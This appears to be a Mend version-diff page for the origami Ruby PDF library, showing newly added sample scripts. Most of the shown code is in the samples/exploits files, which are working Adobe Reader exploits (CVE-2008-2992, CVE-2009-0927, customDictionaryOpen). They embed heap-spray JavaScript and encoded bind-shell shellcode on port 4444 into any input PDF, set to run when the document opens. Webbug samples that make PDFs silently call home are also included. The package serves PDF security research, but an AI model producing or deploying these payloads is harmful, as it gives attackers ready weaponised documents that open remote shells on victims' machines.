RubyGems - origami - Versions diffs - 1.2.1 → 1.2.2 - Mend

origami 1.2.1 → 1.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (121) hide show

data/README +1 -1
data/bin/gui/hexview.rb +1 -1
data/bin/gui/menu.rb +4 -4
data/bin/gui/textview.rb +6 -4
data/bin/gui/treeview.rb +4 -4
data/bin/gui/walker.rb +1 -1
data/bin/pdf2graph +1 -1
data/bin/pdf2pdfa +1 -1
data/bin/pdf2ruby +1 -1
data/bin/pdfcocoon +1 -1
data/bin/pdfcop +1 -1
data/bin/pdfdecompress +1 -1
data/bin/pdfdecrypt +1 -1
data/bin/pdfencrypt +1 -1
data/bin/pdfextract +75 -14
data/bin/pdfmetadata +1 -1
data/bin/shell/.irbrc +1 -1
data/{origami.rb → lib/origami.rb} +3 -3
data/{origami → lib/origami}/3d.rb +0 -0
data/{origami → lib/origami}/acroform.rb +2 -2
data/{origami → lib/origami}/actions.rb +0 -0
data/{origami → lib/origami}/annotations.rb +0 -0
data/{origami → lib/origami}/array.rb +0 -0
data/{origami → lib/origami}/boolean.rb +0 -0
data/{origami → lib/origami}/catalog.rb +0 -0
data/{origami → lib/origami}/destinations.rb +0 -0
data/{origami → lib/origami}/dictionary.rb +0 -0
data/{origami → lib/origami}/docmdp.rb +0 -0
data/{origami → lib/origami}/encryption.rb +9 -7
data/{origami → lib/origami}/export.rb +0 -0
data/lib/origami/extensions/fdf.rb +257 -0
data/{origami/adobe → lib/origami/extensions}/ppklite.rb +3 -1
data/{origami → lib/origami}/file.rb +0 -0
data/{origami → lib/origami}/filters.rb +0 -0
data/{origami → lib/origami}/filters/ascii.rb +0 -0
data/{origami → lib/origami}/filters/ccitt.rb +0 -1
data/{origami → lib/origami}/filters/crypt.rb +0 -0
data/{origami → lib/origami}/filters/dct.rb +0 -0
data/{origami → lib/origami}/filters/flate.rb +0 -0
data/{origami → lib/origami}/filters/jbig2.rb +0 -0
data/{origami → lib/origami}/filters/jpx.rb +0 -0
data/{origami → lib/origami}/filters/lzw.rb +0 -0
data/{origami → lib/origami}/filters/predictors.rb +0 -0
data/{origami → lib/origami}/filters/runlength.rb +0 -0
data/{origami → lib/origami}/font.rb +0 -0
data/{origami → lib/origami}/functions.rb +0 -0
data/{origami → lib/origami}/graphics.rb +0 -0
data/{origami → lib/origami}/graphics/colors.rb +45 -23
data/{origami → lib/origami}/graphics/instruction.rb +0 -0
data/{origami → lib/origami}/graphics/path.rb +0 -0
data/{origami → lib/origami}/graphics/patterns.rb +0 -0
data/{origami → lib/origami}/graphics/render.rb +0 -0
data/{origami → lib/origami}/graphics/state.rb +2 -2
data/{origami → lib/origami}/graphics/text.rb +0 -0
data/{origami → lib/origami}/graphics/xobject.rb +219 -0
data/{origami → lib/origami}/header.rb +0 -0
data/{origami → lib/origami}/javascript.rb +0 -0
data/{origami → lib/origami}/linearization.rb +0 -0
data/{origami → lib/origami}/metadata.rb +0 -0
data/{origami → lib/origami}/name.rb +0 -0
data/{origami → lib/origami}/null.rb +0 -0
data/{origami → lib/origami}/numeric.rb +0 -0
data/{origami → lib/origami}/obfuscation.rb +0 -0
data/{origami → lib/origami}/object.rb +7 -2
data/{origami → lib/origami}/outline.rb +0 -0
data/{origami → lib/origami}/outputintents.rb +0 -0
data/{origami → lib/origami}/page.rb +0 -0
data/{origami → lib/origami}/parser.rb +76 -51
data/{origami → lib/origami}/parsers/fdf.rb +9 -6
data/{origami/parsers/pdf/linear.rb → lib/origami/parsers/pdf.rb} +31 -39
data/lib/origami/parsers/pdf/linear.rb +84 -0
data/lib/origami/parsers/ppklite.rb +93 -0
data/{origami → lib/origami}/pdf.rb +6 -3
data/{origami → lib/origami}/reference.rb +0 -0
data/{origami → lib/origami}/signature.rb +170 -19
data/{origami → lib/origami}/stream.rb +9 -0
data/{origami → lib/origami}/string.rb +0 -0
data/{origami → lib/origami}/trailer.rb +0 -0
data/{origami → lib/origami}/webcapture.rb +0 -0
data/{origami → lib/origami}/xfa.rb +0 -0
data/{origami → lib/origami}/xreftable.rb +3 -7
data/samples/README.txt +45 -0
data/samples/actions/launch/calc.rb +87 -0
data/samples/actions/launch/winparams.rb +22 -0
data/samples/actions/loop/loopgoto.rb +24 -0
data/samples/actions/loop/loopnamed.rb +21 -0
data/samples/actions/named/named.rb +31 -0
data/samples/actions/samba/smbrelay.rb +26 -0
data/samples/actions/triggerevents/trigger.rb +75 -0
data/samples/actions/webbug/submitform.js +26 -0
data/samples/actions/webbug/webbug-browser.rb +68 -0
data/samples/actions/webbug/webbug-js.rb +67 -0
data/samples/actions/webbug/webbug-reader.rb +90 -0
data/samples/attachments/attach.rb +40 -0
data/samples/attachments/attached.txt +1 -0
data/samples/crypto/crypto.rb +28 -0
data/samples/digsig/signed.rb +46 -0
data/samples/exploits/cve-2008-2992-utilprintf.rb +87 -0
data/samples/exploits/cve-2009-0927-geticon.rb +65 -0
data/samples/exploits/exploit_customdictopen.rb +55 -0
data/samples/exploits/getannots.rb +69 -0
data/samples/flash/flash.rb +31 -0
data/samples/flash/helloworld.swf +0 -0
data/samples/javascript/attached.txt +1 -0
data/samples/javascript/js.rb +52 -0
data/{tests → test}/ts_pdf.rb +1 -1
metadata +109 -95
data/origami/adobe/fdf.rb +0 -259
data/origami/parsers/pdf.rb +0 -27
data/origami/parsers/ppklite.rb +0 -86
data/tests/dataset/test.dummycrt +0 -28
data/tests/dataset/test.dummykey +0 -27
data/tests/tc_actions.rb +0 -32
data/tests/tc_annotations.rb +0 -85
data/tests/tc_pages.rb +0 -37
data/tests/tc_pdfattach.rb +0 -24
data/tests/tc_pdfencrypt.rb +0 -110
data/tests/tc_pdfnew.rb +0 -32
data/tests/tc_pdfparse.rb +0 -98
data/tests/tc_pdfsig.rb +0 -37
data/tests/tc_streams.rb +0 -129

data/samples/actions/webbug/webbug-js.rb ADDED Viewed

@@ -0,0 +1,67 @@
+#!/usr/bin/ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "webbug-js.pdf"
+JSCRIPTFILE = "submitform.js"
+puts "Now generating a new PDF file from scratch!"
+contents = ContentStream.new.setFilter(:FlateDecode)
+contents.write OUTPUTFILE,
+  :x => 300, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+contents.write "This PDF tries to connect through JavaScript calls :-D",
+  :x => 186, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
+contents.write "The script first tries to run your browser, then it connects with the Reader.",
+  :x => 186, :y => 670, :size => 15
+contents.write "Comments:",
+  :x => 75, :y => 620, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+content = <<-EOS
+Windows:
+  - Acrobat Reader 8: Same behavior as with webbug-browser.pdf and webbug-reader.pdf.
+  - Foxit: Same behavior as with webbug-browser.pdf and webbug-reader.pdf, at the difference a popup appears
+      to ask for user confirmation before launching the browser. However the reader still connects to the site without
+      confirmation, as with webbug-reader.pdf
+Mac:
+Linux:
+  - Acrobat Reader 8: same behavior as Windows version.
+  - poppler-based viewers: not interpreting JavaScript : nothing happens.
+EOS
+contents.write content,
+  :x => 75, :y => 600, :rendering => Text::Rendering::FILL
+# A JS script to execute at the opening of the document
+jscript = File.open(JSCRIPTFILE).read
+pdf = PDF.new
+page = Page.new
+page.Contents = contents
+pdf.append_page(page)
+# Create a new action based on the script, compressed with zlib
+jsaction = Action::JavaScript.new( Stream.new(jscript,:Filter => :FlateDecode) )
+# Add the script into the document names dictionary. Any scripts registered here will be executed at the document opening (with no OpenAction implied).
+pdf.register(Names::Root::JAVASCRIPT, "Update", jsaction)
+# Save the resulting file
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-reader.rb ADDED Viewed

@@ -0,0 +1,90 @@
+#!/usr/bin/ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "webbug-reader.pdf"
+URL = "http://localhost/webbug-reader.php"
+puts "Now generating a new bugged PDF file from scratch!"
+pdf = PDF.new
+contents = ContentStream.new
+contents.write "webbug-reader.pdf",
+  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+contents.write "When opened, this PDF connects to \"home\"",
+  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
+contents.write "Click \"Allow\" to connect to #{URL} through your current Reader.",
+  :x => 156, :y => 670, :size => 12
+contents.write "Comments:",
+  :x => 75, :y => 600, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+content = <<-EOS
+1. Open this pdf document (webbug-reader.pdf)
+2. The Reader connects to ${url}
+3. The web server returns the requested page:
+      <?php
+        header('Content-type: application/pdf');
+        readfile('calc.pdf');
+      ?>
+4. The Reader receives \"calc.pdf\" which is immediatly rendered
+5. A pop-up ask if it can execute the calc...
+Note: The URL where the Reader tries to connect is displayed
+Windows:
+  - Foxit : Nothing happens.
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+Mac:
+  - Preview: nothing happens
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+Linux:
+  - poppler: /SubmitForm is not supported
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a the document window is replaced with the 2nd document
+      Note: The 2 documents can be seen in the\"Window\" menu.
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+EOS
+contents.write content,
+  :x => 75, :y => 580, :rendering => Text::Rendering::FILL, :size => 12
+page = Page.new.setContents( contents )
+pdf.append_page( page )
+# Submit flags.
+flags = Action::SubmitForm::Flags::EXPORTFORMAT|Action::SubmitForm::Flags::GETMETHOD
+# Sends the form at the document opening.
+pdf.onDocumentOpen Action::SubmitForm.new(URL, [], flags)
+# Comments:
+#  - any port can be specified http://url:1234
+#  - does not follow the Redirect answers
+# Save the resulting file.
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attach.rb ADDED Viewed

@@ -0,0 +1,40 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+INPUTFILE = "attached.txt"
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+puts "Now generating a new PDF file from scratch!"
+# Creating a new file
+pdf = PDF.new
+# Embedding the file into the PDF.
+pdf.attach_file(INPUTFILE,
+  :EmbeddedName => "README.txt",
+  :Filter => :ASCIIHexDecode
+)
+contents = ContentStream.new
+contents.write "File attachment sample",
+  :x => 250, :y => 750, :rendering => Text::Rendering::FILL, :size => 30
+pdf.append_page Page.new.setContents(contents)
+js = <<JS
+  this.exportDataObject({cName:"README.txt", nLaunch:2});
+JS
+pdf.onDocumentOpen Action::JavaScript.new(js)
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attached.txt ADDED Viewed

	@@ -0,0 +1 @@
1	+ *THIS IS THE EMBEDDED FILE*

data/samples/crypto/crypto.rb ADDED Viewed

@@ -0,0 +1,28 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+puts "Now generating a new PDF file from scratch!"
+# Creates an encrypted document with AES256 and a null password.
+pdf = PDF.new.encrypt(:cipher => 'aes', :key_size => 256)
+contents = ContentStream.new
+contents.write "Crypto sample",
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+pdf.append_page Page.new.setContents(contents)
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/digsig/signed.rb ADDED Viewed

@@ -0,0 +1,46 @@
+#!/usr/bin/ruby
+require 'openssl'
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+CERTFILE = "test.crt"
+RSAKEYFILE = "test.key"
+contents = ContentStream.new.setFilter(:FlateDecode)
+contents.write OUTPUTFILE,
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+pdf = PDF.new
+page = Page.new.setContents(contents)
+pdf.append_page(page)
+# Open certificate files
+cert = OpenSSL::X509::Certificate.new(File.open(CERTFILE).read)
+key = OpenSSL::PKey::RSA.new(File.open(RSAKEYFILE).read)
+sigannot = Annotation::Widget::Signature.new
+sigannot.Rect = Rectangle[:llx => 89.0, :lly => 386.0, :urx => 190.0, :ury => 353.0]
+page.add_annot(sigannot)
+# Sign the PDF with the specified keys
+pdf.sign(cert, key,
+  :method => 'adbe.pkcs7.sha1',
+  :annotation => sigannot,
+  :location => "France",
+  :contact => "fred@security-labs.org",
+  :reason => "Proof of Concept"
+)
+# Save the resulting file
+pdf.save(OUTPUTFILE)

data/samples/exploits/cve-2008-2992-utilprintf.rb ADDED Viewed

@@ -0,0 +1,87 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
+win32_bin = "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"
+# linux/x86/shell_bind_tcp - 105 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+# AppendExit=false, PrependSetresuid=false,
+# PrependSetuid=false, LPORT=4444, RHOST=,
+# PrependSetreuid=false
+linux_bin = "%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"
+shellcode = linux_bin
+jscript = %Q|
+/*
+From: http://www.milw0rm.com/exploits/7006
+Adobe Reader Javascript Printf Buffer Overflow Exploit
+===========================================================
+Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
+CVE-2008-2992
+Thanks to coresecurity for the technical background.
+6Nov,2008: Exploit released by me
+Credits: Debasis Mohanty
+www.hackingspirits.com
+www.coffeeandsecurity.com
+===========================================================
+//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
+//www.coffeeandsecurity
+//www.hackingspirits.com
+*/
+    app.alert("Prepare the spray");
+    var shellcode = unescape("#{shellcode}");
+    //Heap Spray starts here - Kiddos dont mess up with this
+    var nop ="";
+    for (i = 128;i >= 0; --i) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
+    heapblock = nop + shellcode;
+    bigblock = unescape("%u9090%u9090");
+    headersize = 20;
+    spray = headersize+heapblock.length
+    while (bigblock.length<spray) bigblock+=bigblock;
+    fillblock = bigblock.substring(0, spray);
+    block = bigblock.substring(0, bigblock.length-spray);
+    while(block.length+spray < 0x40000) block = block+block+fillblock;
+    mem = new Array();
+    for (i=0;i<1400;i++) mem[i] = block + heapblock;
+    app.alert("Pull the trigger");
+// reference snippet from core security
+// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
+var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
+util.printf("%45000f",num);
+//    util.printf("%45000.45000f", 0);
+|
+exploit = Action::JavaScript.new(Stream.new(jscript))
+pdf.onDocumentOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/cve-2009-0927-geticon.rb ADDED Viewed

@@ -0,0 +1,65 @@
+#!/usr/bin/env ruby
+#
+# References:
+#    CVE 2009-0927
+#    http://www.securityfocus.com/bid/34169
+#    http://www.zerodayinitiative.com/advisories/ZDI-09-014/
+#
+#�Vulnerable: Adobe Reader and Adobe Acrobat Professional < 8.1.4
+#
+# This exploit / PoC spawns a calc on Windows.
+#
+#
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+jscript = %Q|
+function spary() {
+var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98\
+bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0\
+ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8\
+c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
+//shellcode = unescape("%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd");
+garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090") + shellcode;
+nopblock = unescape("%u9090%u9090");
+headersize = 10;
+acl = headersize+garbage.length;
+while (nopblock.length<acl) nopblock+=nopblock;
+fillblock = nopblock.substring(0, acl);
+block = nopblock.substring(0, nopblock.length-acl);
+while(block.length+acl<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<180;i++) memory[i] = block + garbage;
+var buffersize = 4012;
+var buffer = Array(buffersize);
+for (i=0; i<buffersize; i++)
+{
+buffer[i] = unescape("%0a%0a%0a%0a");
+}
+Collab.getIcon(buffer+'_N.bundle');
+}
+spary();
+|
+exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+pdf.pages.first.onOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/exploit_customdictopen.rb ADDED Viewed

@@ -0,0 +1,55 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+jscript = %Q|
+//##############
+//Exploit made by Arr1val
+//Proved in adobe 9.1 and adobe 8.1.4 on linux
+//##############
+app.alert('start heap spray...');
+var memory;
+var nop = unescape("%u9090%u9090");
+var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
+while(nop.length <= 0x10000/2) {
+    nop += nop;
+}
+nop = nop.substring(0,0x10000/2 - shellcode.length);
+memory = new Array();
+for (i=0; i<0x6ff0; i++) {
+    memory[i] = nop + shellcode;
+}
+//start exploit now
+start();
+function start()
+{
+	this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141
+}
+//############################
+//# milw0rm.com [2009-04-29]
+|
+#exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+exploit = Action::JavaScript.new(Stream.new(jscript))
+pdf.onDocumentOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")